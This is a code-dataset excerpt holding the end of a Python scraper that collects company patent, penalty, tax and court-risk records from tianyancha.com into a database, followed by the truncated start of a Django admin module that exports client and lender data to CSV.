\"https://capi.tianyancha.com/cloud-intellectual-property/intellectualProperty/softwareCopyrightListV2?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- soft -----\")\n\n if d[\"data\"] == None:\n break\n try:\n items = d[\"data\"]['items']\n except Exception:\n break\n for item in items:\n try:\n simple_name = item['simplename']\n author_nationality = item['authorNationality']\n reg_num = item['regnum']\n full_name = item['fullname']\n cat_num = item['catnum']\n version = item['version']\n reg_date = parse_time(item['regtime'])\n publish_date = parse_time(item['publishtime'])\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Soft = company_software(company_id=company_id, company_num=company_num, simple_name=simple_name,\n author_nationality=author_nationality,\n reg_num=reg_num, full_name=full_name, cat_num=cat_num, version=version,\n reg_date=reg_date, publish_date=publish_date,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Soft)\n finally:\n session.commit()\n print(\"--soft-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 专利3\ndef patent(company_id, company_num):\n time.sleep(0.4)\n while 1:\n try:\n data = {\"_\": \"1662602428454\", \"id\": company_num, \"pageSize\": 100, \"pageNum\": 1, \"type\": \"-100\",\n \"lprs\": \"-100\", \"applyYear\": \"-100\", \"pubYear\": \"-100\", \"sortType\": \"-100\"}\n d = requests.get(\"https://capi.tianyancha.com/cloud-intellectual-property/patent/patentListV6?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n\n print(\"----- patent -----\")\n time.sleep(0.4)\n\n try:\n items = d[\"data\"]['items']\n except Exception:\n break\n # realTotal = d[\"data\"]['realTotal']\n\n if items == None or items == []:\n # print(\"patent is out\")\n # f = True\n break\n for item in items:\n try:\n apply_public_date = item['applicationPublishTime']\n patent_name = item['title']\n apply_num = item['pubnumber']\n # apply_public_num = item['patentNum']\n type = item['patentType']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = company_patent(company_id=company_id, company_num=company_num,\n apply_public_date=apply_public_date, patent_name=patent_name,\n apply_num=apply_num, type=type,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--patent-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 行政处罚3\ndef Administrative_penalties(company_id, company_num):\n # max_pages = 100\n # for page in range(1, max_pages + 1):\n # time.sleep(0.4)\n #\n while 1:\n try:\n data = {\"withOwner\": 0, \"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/punishment/punishIndexList?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n\n print(\"----- Administrative_penalties -----\")\n\n time.sleep(0.4)\n try:\n items = d[\"data\"]['list']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n punishContent = item['punishContent']\n punishDate = item['punishDate']\n punishDepartment = item['punishDepartment']\n punishNumber = item['punishNumber']\n punishReason = item['punishReason']\n showTypeName = item['showTypeName']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_administrative_penalties(company_id=company_id, company_num=company_num,\n punish_content=punishContent, punish_date=punishDate,\n punish_department=punishDepartment,\n punish_number=punishNumber, punish_reason=punishReason,\n show_type_name=showTypeName,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n\n print(\"--Administrative_penalties-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 经营异常3\ndef business_exception(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num,\n \"abnormalType\": 1}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/abnormal/getAbnormalListByType?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- business_exception -----\")\n time.sleep(0.4)\n try:\n items = d[\"data\"]['result']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n putDate = item['putDate']\n putDepartment = item['putDepartment']\n putReason = item['putReason']\n putReasonType = item['putReasonType']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_business_exception(company_id=company_id, company_num=company_num,\n put_date=putDate, put_department=putDepartment,\n put_reason=putReason, put_reason_type=putReasonType,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--business_exception-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 严重违法3\ndef Serious_violation(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"illegalType=1\": 1, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/illegal/getCompanyIllegalInfoListByType?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- Serious_violation -----\")\n\n time.sleep(0.4)\n try:\n items = d[\"data\"]['items']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n putReason = item['putReason']\n putDepartment = item['putDepartment']\n putDate = item['putDate']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_serious_violation(company_id=company_id, company_num=company_num,\n put_date=putDate, put_department=putDepartment,\n put_reason=putReason,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--Serious_violation-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 税收违法3\ndef tax_money(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/taxContraventions/getTaxContraventions?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- tax_money -----\")\n\n time.sleep(0.4)\n try:\n items = d[\"data\"]['result']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n case_type = item['case_type']\n department = item['department']\n taxpayer_name = item['taxpayer_name']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_tax_money(company_id=company_id, company_num=company_num,\n case_type=case_type, department=department,\n taxpayer_name=taxpayer_name,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--tax_money-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 动产抵押 3\ndef home_mortgage(company_id, company_num):\n import json\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num, \"type\": -100}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/chattelMortgage/companyMortgage.json?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- home_mortgage -----\")\n\n time.sleep(0.4)\n try:\n if type(d[\"data\"])==type(''):\n items = json.loads(d[\"data\"])['items']\n else:\n items = d[\"data\"]['items']\n\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n regDate = item['baseInfo']['regDate']\n regNum = item['baseInfo']['regNum']\n peopleInfo = str(item['peopleInfo'])\n mortgagorInfo = str(item['mortgagorInfo'])\n overviewType = item['baseInfo']['overviewType']\n amount = item['baseInfo']['amount']\n overviewTerm = item['baseInfo']['overviewTerm']\n regDepartment = item['baseInfo']['regDepartment']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_home_mortgage(company_id=company_id, company_num=company_num,\n reg_date=regDate, reg_num=regNum,\n people_info=peopleInfo, mort_gagor_info=mortgagorInfo,\n over_view_type=overviewType,\n amount=amount, over_view_term=overviewTerm,\n reg_department=regDepartment,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--home_mortgage-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 环保处罚3\ndef Environmental_money(company_id, company_num):\n while 1:\n try:\n data = {\"withOwner\": 0, \"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num,\n \"punishYear\": -100}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/environmental/getEnvironmentalPenaltiesNew?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- Environmental_money -----\")\n\n time.sleep(0.4)\n\n try:\n if type(d[\"data\"]) == type(''):\n items = json.loads(d[\"data\"])['result']\n else:\n items = d[\"data\"]['result']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n publish_time = parse_time(item['publish_time'])\n punish_number = item['punish_number']\n punish_reason = item['punish_reason']\n punish_content = item['punish_content']\n punish_department = item['punish_department']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_environmental_money(company_id=company_id, company_num=company_num,\n publish_time=publish_time, punish_number=punish_number,\n punish_reason=punish_reason, punish_content=punish_content,\n punish_department=punish_department,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--Environmental_money-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 欠税公告3\ndef owe_tax_notice(company_id, company_num):\n while 1:\n try:\n data = {\"history\": False, \"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/tax/companyowntax.json?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- owe_tax_notice -----\")\n time.sleep(0.4)\n\n try:\n if type(d[\"data\"]) == type(''):\n items = json.loads(d[\"data\"])['items']\n else:\n items = d[\"data\"]['items']\n except Exception:\n break\n\n if items == None or items == []:\n break\n for item in items:\n try:\n legalpersonName = item['legalpersonName']\n location = item['location']\n name = item['name']\n newOwnTaxBalance = item['newOwnTaxBalance']\n ownTaxBalance = item['ownTaxBalance']\n publishDate = item['publishDate']\n taxCategory = item['taxCategory']\n taxIdNumber = item['taxIdNumber']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_owe_tax_notice(company_id=company_id, company_num=company_num,\n legalperson_name=legalpersonName, location=location,\n name=name, new_own_tax_balance=newOwnTaxBalance,\n own_tax_balance=ownTaxBalance,\n publish_date=publishDate,\n tax_category=taxCategory,\n taxId_number=taxIdNumber,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--owe_tax_notice-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 限制消费令3\ndef limit_consumer(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-judicial-risk/risk/getRestrictOrder?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- limit_consumer -----\")\n\n time.sleep(0.4)\n\n try:\n if type(d[\"data\"]) == type(''):\n items = json.loads(d[\"data\"])['items']\n else:\n items = d[\"data\"]['items']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n publish_date = item['publishDate']\n case_code = item['caseCode']\n qy_info = item['qyinfo']\n x_name = item['xname']\n applicant = item['applicant']\n case_create_time = parse_time(item['caseCreateTime'])\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_limit_consumer(company_id=company_id, company_num=company_num,\n publish_date=publish_date, case_code=case_code,\n qy_info=qy_info, x_name=x_name, applicant=applicant,\n case_create_time=case_create_time,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--limit_consumer-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 失信被执行人3\ndef dishonest(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"performance\": -100, \"year\": -100, \"keyWords\": \"\", \"pageSize\": 100,\n \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-judicial-risk/risk/dishonest?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- dishonest -----\")\n time.sleep(0.4)\n try:\n if type(d[\"data\"]) == type(''):\n items = json.loads(d[\"data\"])['items']\n else:\n items = d[\"data\"]['items']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n iname = item['iname']\n disrupttypename = item['disrupttypename']\n casecode = item['casecode']\n performance = item['performance']\n regdate = parse_time(item['regdate'])\n publishdate = parse_time(item['publishdate'])\n gistunit = item['gistunit']\n gistid = item['gistid']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_dishonest(company_id=company_id, company_num=company_num,\n i_name=iname, disrupt_type_name=disrupttypename,\n case_code=casecode, performance=performance, reg_date=regdate,\n publish_date=publishdate, gist_unit=gistunit, gis_tid=gistid,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--dishonest-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 限制出境3\ndef limit_out_city(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-judicial-risk/risk/company/restrictedOutbound/list?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- limit_out_city -----\")\n\n time.sleep(0.4)\n try:\n items = d[\"data\"]['caseList']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n issue_date = item['issueDate']\n human_name = item['humanName']\n executed = str(item['executed'])\n executed_address = item['executedAddress']\n applicant = str(item['applicant'])\n money = item['money']\n court = item['court']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_limit_out_city(company_id=company_id, company_num=company_num,\n issue_date=issue_date, human_name=human_name,\n executed=executed, executed_address=executed_address,\n applicant=applicant, money=money, court=court,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--limit_out_city-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 破产重整3\ndef break_rebuild(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-judicial-risk/bankruptcy/list?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n\n print(\"----- break_rebuild -----\")\n time.sleep(0.4)\n try:\n items = d[\"data\"]['items']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n submitTime = item['submitTime']\n caseNo = item['caseNo']\n caseType = item['caseType']\n applicant = str(item['applicant'])\n respondent = item['respondent']\n court = item['court']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_break_rebuild(company_id=company_id, company_num=company_num,\n submit_time=submitTime, case_no=caseNo,\n case_type=caseType, applicant=applicant, respondent=respondent,\n court=court,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--break_rebuild-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\ndef parse_time(timeStamp):\n otherStyleTime = None\n try:\n if timeStamp == None or timeStamp == '':\n return None\n timeStamp = int(timeStamp / 1000)\n timeArray = time.localtime(timeStamp)\n otherStyleTime = time.strftime(\"%Y-%m-%d\", timeArray)\n except Exception as e:\n print(e)\n finally:\n return otherStyleTime\n\n\n# def patent_unique(table, param2):\n# data = session.query(table).filter(table.apply_num == param2).first()\n# return True if data == None else False\n#\n#\n# def soft_unique(table, param2):\n# data = session.query(table).filter(table.reg_num == param2).first()\n# return True if data == None else False\n\n\nif __name__ == '__main__':\n proxys = [{}]\n dl(proxys)\n\n data = session.query(sheet1).filter(sheet1.company_id != None, sheet1.company_num != None).all()\n print(len(data))\n for index,d in enumerate(data[16000:20000]):\n # if index<5 :\n # continue\n company_id = d.company_id\n company_num = d.company_num\n print(company_id,company_num)\n patent(company_id, company_num)\n soft(company_id, company_num)\n Administrative_penalties(company_id, company_num)\n business_exception(company_id, company_num)\n Serious_violation(company_id, company_num)\n tax_money(company_id, company_num)\n home_mortgage(company_id, company_num)\n Environmental_money(company_id, company_num)\n owe_tax_notice(company_id, company_num)\n limit_consumer(company_id, company_num)\n dishonest(company_id, company_num)\n limit_out_city(company_id, company_num)\n break_rebuild(company_id, company_num)\n","sub_path":"软著专利/spider5.py","file_name":"spider5.py","file_ext":"py","file_size_in_byte":37049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"211862205","text":"from django.contrib import admin\nfrom .models import *\nfrom django.forms.models import model_to_dict\nfrom django.http import HttpResponse\nfrom django.utils.encoding import smart_str\nimport csv\nimport datetime\n\nbools = {\n True: 'Yes',\n False: 'No'\n}\n\n# https://docs.djangoproject.com/en/2.1/ref/contrib/admin/#django.contrib.admin.ModelAdmin.list_display\n# http://books.agiliq.com/projects/django-admin-cookbook/en/latest/export.html\n# ... export functions will go here ..\n\n\n################################################################################\n# CLIENT EXPORT\n################################################################################\ndef export_client_csv(modeladmin, request, queryset):\n date = datetime.datetime.now().date()\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=client_export_' + str(date) + '.csv'\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)\n\n finance_attr = {}\n qualifiers = {}\n needs = {}\n\n finance_attr_obj = ClientFinancialInfoAttr.objects.all()\n q_obj = Qualifier.objects.all()\n n_obj = NeedsList.objects.all()\n\n for a in finance_attr_obj:\n finance_attr[a.id] = a.name\n\n for q in q_obj:\n qualifiers[q.id] = q.name\n\n for n in n_obj:\n needs[n.id] = n.name\n\n header = [\n smart_str(u\"Client First Name\"),\n smart_str(u\"Client Last Name\"),\n smart_str(u\"Client Street Address\"),\n smart_str(u\"Client City\"),\n smart_str(u\"Client State\"),\n smart_str(u\"Client Zip Code\"),\n smart_str(u\"Client Primary Email\"),\n smart_str(u\"Client Secondary Email\"),\n smart_str(u\"Client Work Phone\"),\n smart_str(u\"Client Cell Phone\"),\n smart_str(u\"Client Fax Phone\"),\n smart_str(u\"Client Other Phone\"),\n\n smart_str(u\"Occupation\"),\n smart_str(u\"Company Name\"),\n smart_str(u\"Company Street Address\"),\n smart_str(u\"Company City\"),\n smart_str(u\"Company State\"),\n smart_str(u\"Company Zip\"),\n\n smart_str(u\"Loan Amount\"),\n smart_str(u\"Loan To Value\"),\n smart_str(u\"Loan DSCR\"),\n smart_str(u\"Loan Description\"),\n\n smart_str(u\"Salary\"),\n smart_str(u\"Years In Business\"),\n smart_str(u\"Debt\"),\n smart_str(u\"Monthly Payments\"),\n smart_str(u\"FICO\"),\n ]\n\n for finance_attr_id in sorted(finance_attr):\n header.append(smart_str(finance_attr[finance_attr_id]))\n\n header.extend([\n smart_str(u\"Property Address\"),\n smart_str(u\"Property Value\"),\n\n smart_str(u\"Business Name\"),\n smart_str(u\"Business Main Phone\"),\n smart_str(u\"Business Website\"),\n smart_str(u\"Business Type\"),\n smart_str(u\"Year Business Established\"),\n ])\n\n for q_id in sorted(qualifiers):\n header.append(smart_str(qualifiers[q_id]))\n\n for n_id in sorted(needs):\n header.append(smart_str(needs[n_id]))\n\n writer.writerow(header)\n\n client411 = queryset.select_related(\n 'clientemploymentinfo',\n 'clientloaninfo',\n 'clientfinancialinfo',\n 'clientpropertyinfo',\n 'clientbusinessinfo'\n )\n\n for client in client411:\n fields = [\n smart_str(client.user.first_name),\n smart_str(client.user.last_name),\n smart_str(client.user.address),\n smart_str(client.user.city),\n smart_str(client.user.state),\n smart_str(client.user.zip_code),\n smart_str(client.user.email),\n smart_str(client.user.email_x),\n smart_str(client.user.phone_w),\n smart_str(client.user.phone_m),\n smart_str(client.user.phone_f),\n smart_str(client.user.phone_o),\n ]\n\n if hasattr(client, 'clientemploymentinfo'):\n fields.extend([\n smart_str(client.clientemploymentinfo.occupation),\n smart_str(client.clientemploymentinfo.company_name),\n smart_str(client.clientemploymentinfo.address),\n smart_str(client.clientemploymentinfo.city),\n smart_str(client.clientemploymentinfo.state),\n smart_str(client.clientemploymentinfo.zip_code),\n ])\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n ])\n\n if hasattr(client, 'clientloaninfo'):\n fields.extend([\n smart_str(client.clientloaninfo.amount),\n smart_str(client.clientloaninfo.loan2val),\n smart_str(client.clientloaninfo.dscr),\n smart_str(client.clientloaninfo.desc),\n ])\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n ])\n\n if hasattr(client, 'clientfinancialinfo'):\n fields.extend([\n smart_str(client.clientfinancialinfo.salary),\n smart_str(client.clientfinancialinfo.yrs_in_biz),\n smart_str(client.clientfinancialinfo.debt),\n smart_str(client.clientfinancialinfo.mnthly_pymnts),\n smart_str(client.clientfinancialinfo.fico),\n ])\n\n client_finance_attr = []\n\n # need to get ClientFinancialInfo pk\n f_obj = ClientFinancialInfo.objects.get(client_id=client.id)\n\n for attr in client.clientfinancialinfo.attr.through.objects.filter(clientfinancialinfo_id = f_obj.id):\n # clientfinancialinfoattr_id is the field name in the m2m table\n client_finance_attr.append(attr.clientfinancialinfoattr_id)\n\n for attr_id in sorted(finance_attr):\n if attr_id in client_finance_attr:\n fields.append('Yes')\n else:\n fields.append('No')\n\n\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n ])\n\n if hasattr(client, 'clientpropertyinfo'):\n fields.extend([\n smart_str(client.clientpropertyinfo.address),\n smart_str(client.clientpropertyinfo.value),\n ])\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n ])\n\n if hasattr(client, 'clientbusinessinfo'):\n fields.extend([\n smart_str(client.clientbusinessinfo.name),\n smart_str(client.clientbusinessinfo.phone),\n smart_str(client.clientbusinessinfo.url),\n smart_str(client.clientbusinessinfo.btype),\n smart_str(client.clientbusinessinfo.est),\n ])\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n ])\n\n client_qualifiers = []\n\n for q in client.qualifiers.through.objects.filter(client_id = client.id):\n client_qualifiers.append(q.qualifier_id)\n\n for q_id in sorted(qualifiers):\n if q_id in client_qualifiers:\n fields.append('Yes')\n else:\n fields.append('No')\n\n client_needs = []\n\n for n in client.needs.through.objects.filter(client_id = client.id):\n client_needs.append(n.id)\n\n for n_id in sorted(needs):\n if n_id in client_needs:\n fields.append('Yes')\n else:\n fields.append('No')\n\n writer.writerow(fields)\n # end for\n\n return response\nexport_client_csv.short_description = u\"Client Export CSV\"\n\nclass ClientAdmin(admin.ModelAdmin):\n model = Client\n list_display = ['get_first_name', 'get_last_name']\n actions = [export_client_csv]\n\n def get_first_name(self, obj):\n return obj.user.first_name\n\n get_first_name.short_description = 'First Name'\n get_first_name.admin_order_field = 'user__first_name'\n\n def get_last_name(self, obj):\n return obj.user.last_name\n\n get_last_name.short_description = 'Last Name'\n get_last_name.admin_order_field = 'user__last_name'\n\n# end ClientAdmin\n\n# NOTE disable till fields are fixed\nadmin.site.register(Client, ClientAdmin)\n\n\n################################################################################\n# LENDER EXPORT\n################################################################################\ndef export_lender_csv(modeladmin, request, queryset):\n\n date = datetime.datetime.now().date()\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=lender_export_' + str(date) + '.csv'\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)\n\n qualifiers = {}\n propertytypes = {}\n\n q_obj = Qualifier.objects.all()\n pt_obj = PropertyType.objects.all()\n\n header = [\n smart_str(u\"Lender First Name\"),\n smart_str(u\"Lender Last Name\"),\n smart_str(u\"Lender Company\"),\n smart_str(u\"Lender Street Address\"),\n smart_str(u\"Lender City\"),\n smart_str(u\"Lender State\"),\n smart_str(u\"Lender Zip Code\"),\n smart_str(u\"Lender Primary Email\"),\n smart_str(u\"Lender Secondary Email\"),\n smart_str(u\"Lender Work Phone\"),\n smart_str(u\"Lender Mobile Phone\"),\n smart_str(u\"Lender Fax Phone\"),\n smart_str(u\"Lender Other Phone\"),\n smart_str(u\"Lender Type\"),\n smart_str(u\"Loan Amount\"),\n\n smart_str(u\"Lender Solicitation?\"),\n smart_str(u\"Pays Broker Fees?\"),\n smart_str(u\"Pays Broker Rebate?\"),\n smart_str(u\"Pays via 1099?\"),\n smart_str(u\"Pays through Escrow?\"),\n\n smart_str(u\"Owner Occ. Office?\"),\n smart_str(u\"Owner Occ. Warehouse?\"),\n smart_str(u\"Owner Occ. Manufacturing?\"),\n smart_str(u\"Owner Occ. Medical?\"),\n smart_str(u\"Owner Occ. Mixed Use?\"),\n smart_str(u\"Owner Occ. Industrial?\"),\n smart_str(u\"Owner Occ. Other?\"),\n\n smart_str(u\"Investment Office?\"),\n smart_str(u\"Investment Warehouse?\"),\n smart_str(u\"Investment Manufacturing?\"),\n smart_str(u\"Investment Medical?\"),\n smart_str(u\"Investment Mixed Use?\"),\n smart_str(u\"Investment Industrial?\"),\n smart_str(u\"Investment Other?\"),\n\n smart_str(u\"MultiFamily 2 to 4\"),\n smart_str(u\"MultiFamily more than 4\"),\n\n smart_str(u\"Construction Renovation\"),\n smart_str(u\"Construction Ground Up Spec\"),\n smart_str(u\"Construction Commercial\"),\n smart_str(u\"Construction Residential\"),\n smart_str(u\"Construction Investment with Land\"),\n smart_str(u\"Construction Owner Occ with Land\"),\n smart_str(u\"Construction Investor\"),\n\n smart_str(u\"SBA 7a?\"),\n smart_str(u\"SBA 504?\"),\n smart_str(u\"SBA CAPline?\"),\n smart_str(u\"SBA Microloan?\"),\n smart_str(u\"SBA Express?\"),\n smart_str(u\"SBA ITL?\"),\n smart_str(u\"SBA Other?\"),\n\n smart_str(u\"HELOC 1st Position\"),\n smart_str(u\"HELOC 2nd Position\"),\n smart_str(u\"HELOC 3rd Position\"),\n\n smart_str(u\"BLOC Residential Property\"),\n smart_str(u\"BLOC Stocks\"),\n smart_str(u\"BLOC Savings\"),\n smart_str(u\"BLOC Investment Property\"),\n smart_str(u\"BLOC 1st Position\"),\n smart_str(u\"BLOC 2nd Position\"),\n smart_str(u\"BLOC Equipment\"),\n smart_str(u\"BLOC Working Capital\"),\n smart_str(u\"BLOC Interest Only\"),\n smart_str(u\"BLOC Secured by Accts Receivable\"),\n smart_str(u\"BLOC Secured by Inventory\"),\n smart_str(u\"BLOC RE Secured\"),\n smart_str(u\"BLOC RE Unsecured\"),\n\n smart_str(u\"Bridge?\"),\n smart_str(u\"Commercial Term?\"),\n smart_str(u\"USDA?\"),\n smart_str(u\"Stated Income?\"),\n ]\n\n for q in q_obj:\n qualifiers[q.id] = q.name\n\n for q_id in sorted(qualifiers):\n header.append(smart_str(qualifiers[q_id]))\n\n for p in pt_obj:\n propertytypes[p.id] = p.name\n\n for pt_id in sorted(propertytypes):\n header.append(smart_str(propertytypes[pt_id]))\n\n writer.writerow(header)\n\n lender411 = queryset.select_related(\n 'lenderbrokerrelation',\n 'lenderowneroccupiedre',\n 'lenderinvestmentre',\n 'lendermultifamilyloan',\n 'lenderconstructionloan',\n 'lendersbaloan',\n 'lenderhelocloan',\n 'lenderblocloan',\n 'lenderbridgeloan')\n\n# https://stackoverflow.com/questions/37652520/django-select-related-in-reverse/37792783\n for lender in lender411:\n fields = [\n smart_str(lender.user.first_name),\n smart_str(lender.user.last_name),\n smart_str(lender.company),\n smart_str(lender.user.address),\n smart_str(lender.user.city),\n smart_str(lender.user.state),\n smart_str(lender.user.zip_code),\n smart_str(lender.user.email),\n smart_str(lender.user.email_x),\n smart_str(lender.user.phone_w),\n smart_str(lender.user.phone_m),\n smart_str(lender.user.phone_f),\n smart_str(lender.user.phone_o),\n smart_str(lender.lendertype),\n smart_str(lender.loanamt),\n ]\n\n # https://stackoverflow.com/questions/10487278/how-to-declare-and-add-items-to-an-array-in-python\n # https://stackoverflow.com/questions/27064206/django-check-if-a-related-object-exists-error-relatedobjectdoesnotexist\n if hasattr(lender, 'lenderbrokerrelation'):\n fields.extend([\n smart_str(lender.lenderbrokerrelation.solicit),\n smart_str(bools[lender.lenderbrokerrelation.pays_brkr_fees]),\n smart_str(bools[lender.lenderbrokerrelation.pays_brkr_rebate]),\n smart_str(bools[lender.lenderbrokerrelation.pays_1099]),\n smart_str(bools[lender.lenderbrokerrelation.pays_escrow]),\n ])\n else:\n fields.extend([\n 